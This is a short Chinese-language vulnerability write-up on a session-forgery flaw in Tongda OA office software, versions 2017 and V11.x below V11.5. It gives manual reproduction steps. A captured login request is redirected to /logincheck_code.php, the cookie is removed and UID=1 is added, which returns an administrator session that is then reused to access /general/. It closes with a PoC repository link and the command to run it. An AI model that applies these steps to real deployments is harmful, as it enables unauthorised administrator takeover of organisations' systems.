簡述
通達OA是北京通達信科科技有限公司出品的 "Office Anywhere 通達網絡智能辦公系統"。
該漏洞可獲取任意用戶session,包括系統管理員
影響范圍
通達OA2017
V11.X<V11.5
手工復現
測試版本2017
-
抓登陸包
-
修改再發包
三處地方需要修改:
logincheck.php
=>/logincheck_code.php
- cookie刪掉
- POST包里加個
UID=1
返回的session就是對應UID用戶的session
UID=1就是系統管理員
3. 替換cookie登錄
訪問/general/
poc測試
https://github.com/NS-Sp4ce/TongDaOA-Fake-User
python3 POC.py -v (2017|11) -url url